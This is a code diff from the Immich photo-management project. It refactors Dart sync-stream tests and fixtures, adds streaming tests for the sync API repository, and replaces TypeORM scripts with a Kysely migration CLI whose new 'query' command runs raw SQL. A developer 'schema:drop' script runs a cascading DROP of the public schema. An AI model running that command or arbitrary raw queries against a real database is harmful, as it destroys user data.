|
|
||||||
|
|
||||||
if (!streamController.isClosed) {
|
|
||||||
await streamController.close();
|
|
||||||
}
|
|
||||||
await pumpEventQueue(times: 40);
|
|
||||||
// Small delay to ensure the sync completes
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
await syncFuture;
|
|
||||||
|
|
||||||
verify(() => mockSyncStreamRepo.updateUsersV1(any())).called(1);
|
|
||||||
verify(() => mockSyncStreamRepo.updatePartnerV1(any())).called(1);
|
|
||||||
verify(() => mockSyncApiRepo.ack(any())).called(2);
|
|
||||||
});
|
|
||||||
|
|
||||||
test(
|
|
||||||
"stops processing and ack when cancel checker is completed",
|
|
||||||
() async {
|
|
||||||
final cancellationChecker = _MockCancellationWrapper();
|
final cancellationChecker = _MockCancellationWrapper();
|
||||||
when(() => cancellationChecker.isCancelled()).thenAnswer((_) => false);
|
when(() => cancellationChecker()).thenReturn(false);
|
||||||
|
|
||||||
sut = SyncStreamService(
|
sut = SyncStreamService(
|
||||||
syncApiRepository: mockSyncApiRepo,
|
syncApiRepository: mockSyncApiRepo,
|
||||||
syncStreamRepository: mockSyncStreamRepo,
|
syncStreamRepository: mockSyncStreamRepo,
|
||||||
cancelChecker: cancellationChecker.isCancelled,
|
cancelChecker: cancellationChecker.call,
|
||||||
);
|
);
|
||||||
|
await sut.sync();
|
||||||
|
|
||||||
|
final events = [
|
||||||
|
SyncStreamStub.userDeleteV1,
|
||||||
|
SyncStreamStub.userV1Admin,
|
||||||
|
SyncStreamStub.partnerDeleteV1,
|
||||||
|
];
|
||||||
|
|
||||||
|
when(() => mockSyncStreamRepo.deleteUsersV1(any())).thenAnswer((_) async {
|
||||||
|
when(() => cancellationChecker()).thenReturn(true);
|
||||||
|
});
|
||||||
|
|
||||||
|
await handleEventsCallback(events, mockAbortCallbackWrapper.call);
|
||||||
|
|
||||||
|
verify(() => mockSyncStreamRepo.deleteUsersV1(any())).called(1);
|
||||||
|
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
||||||
|
verifyNever(() => mockSyncStreamRepo.deletePartnerV1(any()));
|
||||||
|
|
||||||
|
verify(() => mockAbortCallbackWrapper()).called(1);
|
||||||
|
|
||||||
|
verify(() => mockSyncApiRepo.ack(["2"])).called(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
test(
|
||||||
|
"aborts and stops processing if cancelled before processing batch",
|
||||||
|
() async {
|
||||||
|
final cancellationChecker = _MockCancellationWrapper();
|
||||||
|
when(() => cancellationChecker()).thenReturn(false);
|
||||||
|
|
||||||
final processingCompleter = Completer<void>();
|
final processingCompleter = Completer<void>();
|
||||||
bool handlerStarted = false;
|
bool handler1Started = false;
|
||||||
|
|
||||||
// Make handler wait so we can cancel it mid-flight
|
|
||||||
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
when(() => mockSyncStreamRepo.deleteUsersV1(any()))
|
||||||
.thenAnswer((_) async {
|
.thenAnswer((_) async {
|
||||||
handlerStarted = true;
|
handler1Started = true;
|
||||||
await processingCompleter
|
return processingCompleter.future;
|
||||||
.future; // Wait indefinitely until test completes it
|
|
||||||
return true;
|
|
||||||
});
|
});
|
||||||
|
|
||||||
final syncFuture = sut.syncUsers();
|
sut = SyncStreamService(
|
||||||
await pumpEventQueue(times: 30);
|
syncApiRepository: mockSyncApiRepo,
|
||||||
|
syncStreamRepository: mockSyncStreamRepo,
|
||||||
streamController.add(SyncStreamStub.userEvents);
|
cancelChecker: cancellationChecker.call,
|
||||||
// Ensure processing starts
|
|
||||||
await Future.delayed(const Duration(milliseconds: 10));
|
|
||||||
|
|
||||||
expect(handlerStarted, isTrue, reason: "Handler should have started");
|
|
||||||
|
|
||||||
when(() => cancellationChecker.isCancelled()).thenAnswer((_) => true);
|
|
||||||
|
|
||||||
// Allow cancellation logic to propagate
|
|
||||||
await Future.delayed(const Duration(milliseconds: 10));
|
|
||||||
|
|
||||||
// Complete the handler's completer after cancellation signal
|
|
||||||
// to ensure the cancellation logic itself isn't blocked by the handler.
|
|
||||||
processingCompleter.complete();
|
|
||||||
|
|
||||||
await expectLater(syncFuture, throwsA(isA<CanceledError>()));
|
|
||||||
|
|
||||||
// Verify that ack was NOT called because processing was cancelled
|
|
||||||
verifyNever(() => mockSyncApiRepo.ack(any()));
|
|
||||||
},
|
|
||||||
);
|
);
|
||||||
|
|
||||||
test("completes successfully when ack call throws an exception", () async {
|
await sut.sync();
|
||||||
when(() => mockSyncApiRepo.ack(any())).thenThrow(Exception("Ack Error"));
|
|
||||||
final events = [
|
final events = [
|
||||||
...SyncStreamStub.userEvents,
|
SyncStreamStub.userDeleteV1,
|
||||||
...SyncStreamStub.partnerEvents,
|
SyncStreamStub.userV1Admin,
|
||||||
|
SyncStreamStub.partnerDeleteV1,
|
||||||
];
|
];
|
||||||
|
|
||||||
// Should still complete even if ack fails
|
final processingFuture =
|
||||||
await triggerSyncAndEmit(events);
|
handleEventsCallback(events, mockAbortCallbackWrapper.call);
|
||||||
verify(() => mockSyncApiRepo.ack(any()))
|
|
||||||
.called(1); // Verify ack was attempted
|
|
||||||
});
|
|
||||||
|
|
||||||
test("waits for processing to finish if onDone called early", () async {
|
|
||||||
final processingCompleter = Completer<void>();
|
|
||||||
bool handlerFinished = false;
|
|
||||||
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any())).thenAnswer((_) async {
|
|
||||||
await processingCompleter.future; // Wait inside handler
|
|
||||||
handlerFinished = true;
|
|
||||||
return true;
|
|
||||||
});
|
|
||||||
|
|
||||||
final syncFuture = sut.syncUsers();
|
|
||||||
// Allow listener to attach
|
|
||||||
// This is necessary to ensure the stream is ready to receive events
|
|
||||||
await Future.delayed(Duration.zero);
|
|
||||||
|
|
||||||
streamController.add(SyncStreamStub.userEvents); // Emit batch
|
|
||||||
await Future.delayed(
|
|
||||||
const Duration(milliseconds: 10),
|
|
||||||
); // Ensure processing starts
|
|
||||||
|
|
||||||
await streamController
|
|
||||||
.close(); // Close stream (triggers onDone internally)
|
|
||||||
await Future.delayed(
|
|
||||||
const Duration(milliseconds: 10),
|
|
||||||
); // Give onDone a chance to fire
|
|
||||||
|
|
||||||
// At this point, onDone was called, but processing is blocked
|
|
||||||
expect(handlerFinished, isFalse);
|
|
||||||
|
|
||||||
processingCompleter.complete(); // Allow processing to finish
|
|
||||||
await syncFuture; // Now the main future should complete
|
|
||||||
|
|
||||||
expect(handlerFinished, isTrue);
|
|
||||||
verify(() => mockSyncApiRepo.ack(any())).called(1);
|
|
||||||
});
|
|
||||||
|
|
||||||
test("processes events in the defined _kSyncTypeOrder", () async {
|
|
||||||
final future = sut.syncUsers();
|
|
||||||
await pumpEventQueue();
|
await pumpEventQueue();
|
||||||
if (!streamController.isClosed) {
|
|
||||||
final events = [
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.partnerV1,
|
|
||||||
data: SyncStreamStub.partnerV1,
|
|
||||||
ack: "1",
|
|
||||||
), // Should be processed last
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.userV1,
|
|
||||||
data: SyncStreamStub.userV1Admin,
|
|
||||||
ack: "2",
|
|
||||||
), // Should be processed second
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.partnerDeleteV1,
|
|
||||||
data: SyncStreamStub.partnerDeleteV1,
|
|
||||||
ack: "3",
|
|
||||||
), // Should be processed third
|
|
||||||
SyncEvent(
|
|
||||||
type: SyncEntityType.userDeleteV1,
|
|
||||||
data: SyncStreamStub.userDeleteV1,
|
|
||||||
ack: "4",
|
|
||||||
), // Should be processed first
|
|
||||||
];
|
|
||||||
|
|
||||||
streamController.add(events);
|
expect(handler1Started, isTrue);
|
||||||
await streamController.close();
|
|
||||||
}
|
|
||||||
await future;
|
|
||||||
|
|
||||||
verifyInOrder([
|
// Signal cancellation while handler 1 is waiting
|
||||||
() => mockSyncStreamRepo.deleteUsersV1(any()),
|
when(() => cancellationChecker()).thenReturn(true);
|
||||||
() => mockSyncStreamRepo.updateUsersV1(any()),
|
await pumpEventQueue();
|
||||||
() => mockSyncStreamRepo.deletePartnerV1(any()),
|
|
||||||
() => mockSyncStreamRepo.updatePartnerV1(any()),
|
|
||||||
// Verify ack happens after all processing
|
|
||||||
() => mockSyncApiRepo.ack(any()),
|
|
||||||
]);
|
|
||||||
});
|
|
||||||
});
|
|
||||||
|
|
||||||
group("syncUsers", () {
|
processingCompleter.complete();
|
||||||
test("calls getSyncEvents with correct types", () async {
|
await processingFuture;
|
||||||
// Need to close the stream for the future to complete
|
|
||||||
final future = sut.syncUsers();
|
|
||||||
await streamController.close();
|
|
||||||
await future;
|
|
||||||
|
|
||||||
verify(
|
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
||||||
() => mockSyncApiRepo.getSyncEvents([
|
|
||||||
SyncRequestType.usersV1,
|
|
||||||
SyncRequestType.partnersV1,
|
|
||||||
]),
|
|
||||||
).called(1);
|
|
||||||
});
|
|
||||||
|
|
||||||
test("calls repository methods with correctly grouped data", () async {
|
verify(() => mockSyncApiRepo.ack(["2"])).called(1);
|
||||||
final events = [
|
},
|
||||||
...SyncStreamStub.userEvents,
|
);
|
||||||
...SyncStreamStub.partnerEvents,
|
|
||||||
];
|
|
||||||
await triggerSyncAndEmit(events);
|
|
||||||
|
|
||||||
// Verify each handler was called with the correct list of data payloads
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo.updateUsersV1(
|
|
||||||
[SyncStreamStub.userV1Admin, SyncStreamStub.userV1User],
|
|
||||||
),
|
|
||||||
).called(1);
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo.deleteUsersV1([SyncStreamStub.userDeleteV1]),
|
|
||||||
).called(1);
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo.updatePartnerV1([SyncStreamStub.partnerV1]),
|
|
||||||
).called(1);
|
|
||||||
verify(
|
|
||||||
() => mockSyncStreamRepo
|
|
||||||
.deletePartnerV1([SyncStreamStub.partnerDeleteV1]),
|
|
||||||
).called(1);
|
|
||||||
});
|
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
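For readers following the refactor: the replacement tests above pin down a per-type contract for batch handling — events are grouped by type, each group is handed to its repository handler, the ack for that group is sent immediately after the handler succeeds, and a cancel check between groups triggers the abort callback instead of further processing. A minimal, runnable sketch of that contract with hypothetical, simplified names (the real `SyncStreamService._handleEvents` is not part of this diff):

```dart
// Hypothetical sketch only; `Event`, the handler, and the callbacks are
// simplified stand-ins for the types used by the service under test.
class Event {
  final String type;
  final String ack;
  const Event(this.type, this.ack);
}

Future<void> handleEvents(
  List<Event> events, {
  required Future<void> Function(List<Event> group) handler,
  required Future<void> Function(List<String> acks) ack,
  required bool Function() isCancelled,
  required void Function() abort,
}) async {
  // Group the batch by event type, preserving first-seen order.
  final groups = <String, List<Event>>{};
  for (final event in events) {
    groups.putIfAbsent(event.type, () => []).add(event);
  }
  for (final group in groups.values) {
    if (isCancelled()) {
      abort(); // later groups are never handled or acked
      return;
    }
    await handler(group);
    await ack([group.last.ack]); // ack only what was just processed
  }
}

Future<void> main() async {
  await handleEvents(
    const [Event('userDeleteV1', '2'), Event('userV1', '5')],
    handler: (group) async => print('handled ${group.length} ${group.first.type}'),
    ack: (acks) async => print('ack $acks'),
    isCancelled: () => false,
    abort: () => print('aborted'),
  );
}
```

This mirrors why the tests assert `ack(["2"])` right after `deleteUsersV1` rather than a single combined ack at the end.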
52 mobile/test/fixtures/sync_stream.stub.dart vendored
@@ -2,44 +2,44 @@ import 'package:immich_mobile/domain/models/sync_event.model.dart';
 import 'package:openapi/api.dart';

 abstract final class SyncStreamStub {
-  static final userV1Admin = SyncUserV1(
-    deletedAt: DateTime(2020),
-    email: "admin@admin",
-    id: "1",
-    name: "Admin",
+  static final userV1Admin = SyncEvent(
+    type: SyncEntityType.userV1,
+    data: SyncUserV1(
+      deletedAt: DateTime(2020),
+      email: "admin@admin",
+      id: "1",
+      name: "Admin",
+    ),
+    ack: "1",
   );
-  static final userV1User = SyncUserV1(
-    deletedAt: DateTime(2021),
-    email: "user@user",
-    id: "2",
-    name: "User",
-  );
-
-  static final userDeleteV1 = SyncUserDeleteV1(userId: "2");
-  static final userEvents = [
-    SyncEvent(type: SyncEntityType.userV1, data: userV1Admin, ack: "1"),
-    SyncEvent(
-      type: SyncEntityType.userDeleteV1,
-      data: userDeleteV1,
-      ack: "2",
-    ),
-    SyncEvent(type: SyncEntityType.userV1, data: userV1User, ack: "5"),
-  ];
+  static final userV1User = SyncEvent(
+    type: SyncEntityType.userV1,
+    data: SyncUserV1(
+      deletedAt: DateTime(2021),
+      email: "user@user",
+      id: "5",
+      name: "User",
+    ),
+    ack: "5",
+  );
+  static final userDeleteV1 = SyncEvent(
+    type: SyncEntityType.userDeleteV1,
+    data: SyncUserDeleteV1(userId: "2"),
+    ack: "2",
+  );

-  static final partnerV1 = SyncPartnerV1(
-    inTimeline: true,
-    sharedById: "1",
-    sharedWithId: "2",
-  );
-  static final partnerDeleteV1 = SyncPartnerDeleteV1(
-    sharedById: "3",
-    sharedWithId: "4",
-  );
-  static final partnerEvents = [
-    SyncEvent(
-      type: SyncEntityType.partnerDeleteV1,
-      data: partnerDeleteV1,
-      ack: "4",
-    ),
-    SyncEvent(type: SyncEntityType.partnerV1, data: partnerV1, ack: "3"),
-  ];
+  static final partnerV1 = SyncEvent(
+    type: SyncEntityType.partnerV1,
+    data: SyncPartnerV1(
+      inTimeline: true,
+      sharedById: "1",
+      sharedWithId: "2",
+    ),
+    ack: "3",
+  );
+  static final partnerDeleteV1 = SyncEvent(
+    type: SyncEntityType.partnerDeleteV1,
+    data: SyncPartnerDeleteV1(sharedById: "3", sharedWithId: "4"),
+    ack: "4",
+  );
 }
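The fixture change above replaces bare payloads plus pre-built event lists with one named `SyncEvent` per fixture, so each test composes exactly the events it needs. A small, self-contained Dart analogue of that shape (illustrative only; not the project's actual types):

```dart
// Illustrative analogue: each stub carries type + payload + ack together.
class Event<T> {
  final String type;
  final T data;
  final String ack;
  const Event(this.type, this.data, this.ack);
}

abstract final class Stubs {
  static const userDelete = Event('userDeleteV1', {'userId': '2'}, '2');
  static const partnerDelete =
      Event('partnerDeleteV1', {'sharedById': '3', 'sharedWithId': '4'}, '4');
}

void main() {
  // Tests can now compose exactly the events they need, in any order.
  final events = [Stubs.userDelete, Stubs.partnerDelete];
  print(events.map((e) => '${e.type}:${e.ack}').join(', '));
}
```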
@@ -0,0 +1,299 @@
+import 'dart:async';
+import 'dart:convert';
+
+import 'package:flutter_test/flutter_test.dart';
+import 'package:http/http.dart' as http;
+import 'package:immich_mobile/domain/models/sync_event.model.dart';
+import 'package:immich_mobile/infrastructure/repositories/sync_api.repository.dart';
+import 'package:mocktail/mocktail.dart';
+import 'package:openapi/api.dart';
+
+import '../../api.mocks.dart';
+import '../../service.mocks.dart';
+
+class MockHttpClient extends Mock implements http.Client {}
+
+class MockApiClient extends Mock implements ApiClient {}
+
+class MockStreamedResponse extends Mock implements http.StreamedResponse {}
+
+class FakeBaseRequest extends Fake implements http.BaseRequest {}
+
+String _createJsonLine(String type, Map<String, dynamic> data, String ack) {
+  return '${jsonEncode({'type': type, 'data': data, 'ack': ack})}\n';
+}
+
+void main() {
+  late SyncApiRepository sut;
+  late MockApiService mockApiService;
+  late MockApiClient mockApiClient;
+  late MockSyncApi mockSyncApi;
+  late MockHttpClient mockHttpClient;
+  late MockStreamedResponse mockStreamedResponse;
+  late StreamController<List<int>> responseStreamController;
+  late int testBatchSize = 3;
+
+  setUp(() {
+    mockApiService = MockApiService();
+    mockApiClient = MockApiClient();
+    mockSyncApi = MockSyncApi();
+    mockHttpClient = MockHttpClient();
+    mockStreamedResponse = MockStreamedResponse();
+    responseStreamController =
+        StreamController<List<int>>.broadcast(sync: true);
+
+    registerFallbackValue(FakeBaseRequest());
+
+    when(() => mockApiService.apiClient).thenReturn(mockApiClient);
+    when(() => mockApiService.syncApi).thenReturn(mockSyncApi);
+    when(() => mockApiClient.basePath).thenReturn('http://demo.immich.app/api');
+    when(() => mockApiService.applyToParams(any(), any()))
+        .thenAnswer((_) async => {});
+
+    // Mock HTTP client behavior
+    when(() => mockHttpClient.send(any()))
+        .thenAnswer((_) async => mockStreamedResponse);
+    when(() => mockStreamedResponse.statusCode).thenReturn(200);
+    when(() => mockStreamedResponse.stream)
+        .thenAnswer((_) => http.ByteStream(responseStreamController.stream));
+    when(() => mockHttpClient.close()).thenAnswer((_) => {});
+
+    sut = SyncApiRepository(mockApiService);
+  });
+
+  tearDown(() async {
+    if (!responseStreamController.isClosed) {
+      await responseStreamController.close();
+    }
+  });
+
+  Future<void> streamChanges(
+    Function(List<SyncEvent>, Function() abort) onDataCallback,
+  ) {
+    return sut.streamChanges(
+      onDataCallback,
+      batchSize: testBatchSize,
+      httpClient: mockHttpClient,
+    );
+  }
+
+  test('streamChanges stops processing stream when abort is called', () async {
+    int onDataCallCount = 0;
+    bool abortWasCalledInCallback = false;
+    List<SyncEvent> receivedEventsBatch1 = [];
+
+    onDataCallback(List<SyncEvent> events, Function() abort) {
+      onDataCallCount++;
+      if (onDataCallCount == 1) {
+        receivedEventsBatch1 = events;
+        abort();
+        abortWasCalledInCallback = true;
+      } else {
+        fail("onData called more than once after abort was invoked");
+      }
+    }
+
+    final streamChangesFuture = streamChanges(onDataCallback);
+
+    await pumpEventQueue();
+
+    for (int i = 0; i < testBatchSize; i++) {
+      responseStreamController.add(
+        utf8.encode(
+          _createJsonLine(
+            SyncEntityType.userDeleteV1.toString(),
+            SyncUserDeleteV1(userId: "user$i").toJson(),
+            'ack$i',
+          ),
+        ),
+      );
+    }
+
+    for (int i = testBatchSize; i < testBatchSize * 2; i++) {
+      responseStreamController.add(
+        utf8.encode(
+          _createJsonLine(
+            SyncEntityType.userDeleteV1.toString(),
+            SyncUserDeleteV1(userId: "user$i").toJson(),
+            'ack$i',
+          ),
+        ),
+      );
+    }
+
+    await responseStreamController.close();
+    await expectLater(streamChangesFuture, completes);
+
+    expect(onDataCallCount, 1);
+    expect(abortWasCalledInCallback, isTrue);
+    expect(receivedEventsBatch1.length, testBatchSize);
+    verify(() => mockHttpClient.close()).called(1);
+  });
+
+  test(
+    'streamChanges does not process remaining lines in finally block if aborted',
+    () async {
+      int onDataCallCount = 0;
+      bool abortWasCalledInCallback = false;
+
+      onDataCallback(List<SyncEvent> events, Function() abort) {
+        onDataCallCount++;
+        if (onDataCallCount == 1) {
+          abort();
+          abortWasCalledInCallback = true;
+        } else {
+          fail("onData called more than once after abort was invoked");
+        }
+      }
+
+      final streamChangesFuture = streamChanges(onDataCallback);
+
+      await pumpEventQueue();
+
+      for (int i = 0; i < testBatchSize; i++) {
+        responseStreamController.add(
+          utf8.encode(
+            _createJsonLine(
+              SyncEntityType.userDeleteV1.toString(),
+              SyncUserDeleteV1(userId: "user$i").toJson(),
+              'ack$i',
+            ),
+          ),
+        );
+      }
+
+      // emit a single event to skip batching and trigger finally
+      responseStreamController.add(
+        utf8.encode(
+          _createJsonLine(
+            SyncEntityType.userDeleteV1.toString(),
+            SyncUserDeleteV1(userId: "user100").toJson(),
+            'ack100',
+          ),
+        ),
+      );
+
+      await responseStreamController.close();
+      await expectLater(streamChangesFuture, completes);
+
+      expect(onDataCallCount, 1);
+      expect(abortWasCalledInCallback, isTrue);
+      verify(() => mockHttpClient.close()).called(1);
+    },
+  );
+
+  test(
+    'streamChanges processes remaining lines in finally block if not aborted',
+    () async {
+      int onDataCallCount = 0;
+      List<SyncEvent> receivedEventsBatch1 = [];
+      List<SyncEvent> receivedEventsBatch2 = [];
+
+      onDataCallback(List<SyncEvent> events, Function() _) {
+        onDataCallCount++;
+        if (onDataCallCount == 1) {
+          receivedEventsBatch1 = events;
+        } else if (onDataCallCount == 2) {
+          receivedEventsBatch2 = events;
+        } else {
+          fail("onData called more than expected");
+        }
+      }
+
+      final streamChangesFuture = streamChanges(onDataCallback);
+
+      await pumpEventQueue();
+
+      // Batch 1
+      for (int i = 0; i < testBatchSize; i++) {
+        responseStreamController.add(
+          utf8.encode(
+            _createJsonLine(
+              SyncEntityType.userDeleteV1.toString(),
+              SyncUserDeleteV1(userId: "user$i").toJson(),
+              'ack$i',
+            ),
+          ),
+        );
+      }
+
+      // Partial Batch 2
+      responseStreamController.add(
+        utf8.encode(
+          _createJsonLine(
+            SyncEntityType.userDeleteV1.toString(),
+            SyncUserDeleteV1(userId: "user100").toJson(),
+            'ack100',
+          ),
+        ),
+      );
+
+      await responseStreamController.close();
+      await expectLater(streamChangesFuture, completes);
+
+      expect(onDataCallCount, 2);
+      expect(receivedEventsBatch1.length, testBatchSize);
+      expect(receivedEventsBatch2.length, 1);
+      verify(() => mockHttpClient.close()).called(1);
+    },
+  );
+
+  test('streamChanges handles stream error gracefully', () async {
+    final streamError = Exception("Network Error");
+    int onDataCallCount = 0;
+
+    onDataCallback(List<SyncEvent> events, Function() _) {
+      onDataCallCount++;
+    }
+
+    final streamChangesFuture = streamChanges(onDataCallback);
+
+    await pumpEventQueue();
+
+    responseStreamController.add(
+      utf8.encode(
+        _createJsonLine(
+          SyncEntityType.userDeleteV1.toString(),
+          SyncUserDeleteV1(userId: "user1").toJson(),
+          'ack1',
+        ),
+      ),
+    );
+
+    responseStreamController.addError(streamError);
+    await expectLater(streamChangesFuture, throwsA(streamError));
+
+    expect(onDataCallCount, 0);
+    verify(() => mockHttpClient.close()).called(1);
+  });
+
+  test('streamChanges throws ApiException on non-200 status code', () async {
+    when(() => mockStreamedResponse.statusCode).thenReturn(401);
+    final errorBodyController = StreamController<List<int>>(sync: true);
+    when(() => mockStreamedResponse.stream)
+        .thenAnswer((_) => http.ByteStream(errorBodyController.stream));
+
+    int onDataCallCount = 0;
+
+    onDataCallback(List<SyncEvent> events, Function() _) {
+      onDataCallCount++;
+    }
+
+    final future = streamChanges(onDataCallback);
+
+    errorBodyController.add(utf8.encode('{"error":"Unauthorized"}'));
+    await errorBodyController.close();
+
+    await expectLater(
+      future,
+      throwsA(
+        isA<ApiException>()
+            .having((e) => e.code, 'code', 401)
+            .having((e) => e.message, 'message', contains('Unauthorized')),
+      ),
+    );
+
+    expect(onDataCallCount, 0);
+    verify(() => mockHttpClient.close()).called(1);
+  });
+}
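The new repository tests above exercise a newline-delimited JSON stream: decode complete lines into events, deliver full batches as they fill, and flush any partial batch once the stream ends unless the caller aborted. A runnable sketch of that batching behaviour under those assumptions (hypothetical names; the actual `streamChanges` implementation is not shown in this diff):

```dart
import 'dart:convert';

// Hypothetical sketch of NDJSON batching: chunks may split lines arbitrarily,
// so we buffer until a newline, decode, and batch up to `batchSize`.
void processNdjson(
  List<String> chunks, {
  required int batchSize,
  required void Function(
          List<Map<String, dynamic>> batch, void Function() abort)
      onData,
}) {
  var aborted = false;
  final batch = <Map<String, dynamic>>[];

  void flush() {
    if (batch.isEmpty || aborted) return;
    final copy = List<Map<String, dynamic>>.of(batch);
    batch.clear();
    onData(copy, () {
      aborted = true;
    });
  }

  var buffer = '';
  for (final chunk in chunks) {
    buffer += chunk;
    var index = buffer.indexOf('\n');
    while (index != -1 && !aborted) {
      final line = buffer.substring(0, index);
      buffer = buffer.substring(index + 1);
      if (line.isNotEmpty) {
        batch.add(jsonDecode(line) as Map<String, dynamic>);
        if (batch.length >= batchSize) flush();
      }
      index = buffer.indexOf('\n');
    }
  }
  // "finally" step: deliver the partial batch only if not aborted.
  flush();
}

void main() {
  processNdjson(
    ['{"ack":"1"}\n{"ack":"2"}\n', '{"ack":"3"}\n{"ack":"4"}\n'],
    batchSize: 3,
    onData: (batch, abort) => print('got ${batch.length} events'),
  );
}
```

This matches the test expectations: a full batch of `batchSize` first, then a final partial batch on close, and no final delivery after `abort()`.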
@@ -26,9 +26,8 @@
     "migrations:generate": "node ./dist/bin/migrations.js generate",
     "migrations:create": "node ./dist/bin/migrations.js create",
     "migrations:run": "node ./dist/bin/migrations.js run",
-    "typeorm:migrations:revert": "typeorm migration:revert -d ./dist/bin/database.js",
-    "typeorm:schema:drop": "typeorm query -d ./dist/bin/database.js 'DROP schema public cascade; CREATE schema public;'",
-    "typeorm:schema:reset": "npm run typeorm:schema:drop && npm run migrations:run",
+    "schema:drop": "node ./dist/bin/migrations.js query 'DROP schema public cascade; CREATE schema public;'",
+    "schema:reset": "npm run schema:drop && npm run migrations:run",
     "kysely:codegen": "npx kysely-codegen --include-pattern=\"(public|vectors).*\" --dialect postgres --url postgres://postgres:postgres@localhost/immich --log-level debug --out-file=./src/db.d.ts",
     "sync:open-api": "node ./dist/bin/sync-open-api.js",
     "sync:sql": "node ./dist/bin/sync-sql.js",
@@ -1,11 +0,0 @@
-import { ConfigRepository } from 'src/repositories/config.repository';
-import { DataSource } from 'typeorm';
-
-const { database } = new ConfigRepository().getEnv();
-
-/**
- * @deprecated - DO NOT USE THIS
- *
- * this export is ONLY to be used for TypeORM commands in package.json#scripts
- */
-export const dataSource = new DataSource({ ...database.config.typeorm, host: 'localhost' });
@@ -1,8 +1,8 @@
 #!/usr/bin/env node
 process.env.DB_URL = process.env.DB_URL || 'postgres://postgres:postgres@localhost:5432/immich';

-import { Kysely } from 'kysely';
-import { writeFileSync } from 'node:fs';
+import { Kysely, sql } from 'kysely';
+import { mkdirSync, writeFileSync } from 'node:fs';
 import { basename, dirname, extname, join } from 'node:path';
 import postgres from 'postgres';
 import { ConfigRepository } from 'src/repositories/config.repository';
@@ -23,8 +23,13 @@ const main = async () => {
     }

     case 'run': {
-      const only = process.argv[3] as 'kysely' | 'typeorm' | undefined;
-      await run(only);
+      await runMigrations();
+      return;
+    }
+
+    case 'query': {
+      const query = process.argv[3];
+      await runQuery(query);
       return;
     }

@@ -48,14 +53,25 @@ const main = async () => {
   }
 };

-const run = async (only?: 'kysely' | 'typeorm') => {
+const getDatabaseClient = () => {
   const configRepository = new ConfigRepository();
   const { database } = configRepository.getEnv();
-  const logger = new LoggingRepository(undefined, configRepository);
-  const db = new Kysely<any>(getKyselyConfig(database.config.kysely));
-  const databaseRepository = new DatabaseRepository(db, logger, configRepository);
-
-  await databaseRepository.runMigrations({ only });
+  return new Kysely<any>(getKyselyConfig(database.config.kysely));
+};
+
+const runQuery = async (query: string) => {
+  const db = getDatabaseClient();
+  await sql.raw(query).execute(db);
+  await db.destroy();
+};
+
+const runMigrations = async () => {
+  const configRepository = new ConfigRepository();
+  const logger = new LoggingRepository(undefined, configRepository);
+  const db = getDatabaseClient();
+  const databaseRepository = new DatabaseRepository(db, logger, configRepository);
+  await databaseRepository.runMigrations();
+  await db.destroy();
 };

 const debug = async () => {
@@ -81,7 +97,8 @@ const create = (path: string, up: string[], down: string[]) => {
   const filename = `${timestamp}-${name}.ts`;
   const folder = dirname(path);
   const fullPath = join(folder, filename);
-  writeFileSync(fullPath, asMigration('typeorm', { name, timestamp, up, down }));
+  mkdirSync(folder, { recursive: true });
+  writeFileSync(fullPath, asMigration('kysely', { name, timestamp, up, down }));
   console.log(`Wrote ${fullPath}`);
 };

@@ -1,13 +1,13 @@
 import { Selectable } from 'kysely';
-import { AssetJobStatus as DatabaseAssetJobStatus, Exif as DatabaseExif } from 'src/db';
-import { AssetEntity } from 'src/entities/asset.entity';
+import { Albums, Exif as DatabaseExif } from 'src/db';
+import { MapAsset } from 'src/dtos/asset-response.dto';
 import {
   AlbumUserRole,
   AssetFileType,
-  AssetStatus,
   AssetType,
   MemoryType,
   Permission,
+  SharedLinkType,
   SourceType,
   UserStatus,
 } from 'src/enum';
@@ -44,7 +44,7 @@ export type Library = {
   exclusionPatterns: string[];
   deletedAt: Date | null;
   refreshedAt: Date | null;
-  assets?: Asset[];
+  assets?: MapAsset[];
 };

 export type AuthApiKey = {
@@ -96,7 +96,26 @@ export type Memory = {
   data: OnThisDayData;
   ownerId: string;
   isSaved: boolean;
-  assets: Asset[];
+  assets: MapAsset[];
+};
+
+export type Asset = {
+  id: string;
+  checksum: Buffer<ArrayBufferLike>;
+  deviceAssetId: string;
+  deviceId: string;
+  fileCreatedAt: Date;
+  fileModifiedAt: Date;
+  isExternal: boolean;
+  isVisible: boolean;
+  libraryId: string | null;
+  livePhotoVideoId: string | null;
+  localDateTime: Date;
+  originalFileName: string;
+  originalPath: string;
+  ownerId: string;
+  sidecarPath: string | null;
+  type: AssetType;
 };

 export type User = {
@@ -128,39 +147,6 @@ export type StorageAsset = {
   encodedVideoPath: string | null;
 };

-export type Asset = {
-  createdAt: Date;
-  updatedAt: Date;
-  deletedAt: Date | null;
-  id: string;
-  updateId: string;
-  status: AssetStatus;
-  checksum: Buffer<ArrayBufferLike>;
-  deviceAssetId: string;
-  deviceId: string;
-  duplicateId: string | null;
-  duration: string | null;
-  encodedVideoPath: string | null;
-  fileCreatedAt: Date | null;
-  fileModifiedAt: Date | null;
-  isArchived: boolean;
-  isExternal: boolean;
-  isFavorite: boolean;
-  isOffline: boolean;
-  isVisible: boolean;
-  libraryId: string | null;
-  livePhotoVideoId: string | null;
-  localDateTime: Date | null;
-  originalFileName: string;
-  originalPath: string;
-  ownerId: string;
-  sidecarPath: string | null;
-  stack?: Stack | null;
-  stackId: string | null;
-  thumbhash: Buffer<ArrayBufferLike> | null;
-  type: AssetType;
-};
-
 export type SidecarWriteAsset = {
   id: string;
   sidecarPath: string | null;
@@ -173,7 +159,7 @@ export type Stack = {
   primaryAssetId: string;
   owner?: User;
   ownerId: string;
-  assets: AssetEntity[];
+  assets: MapAsset[];
   assetCount?: number;
 };

@@ -187,6 +173,28 @@ export type AuthSharedLink = {
   password: string | null;
 };

+export type SharedLink = {
+  id: string;
+  album?: Album | null;
+  albumId: string | null;
+  allowDownload: boolean;
+  allowUpload: boolean;
+  assets: MapAsset[];
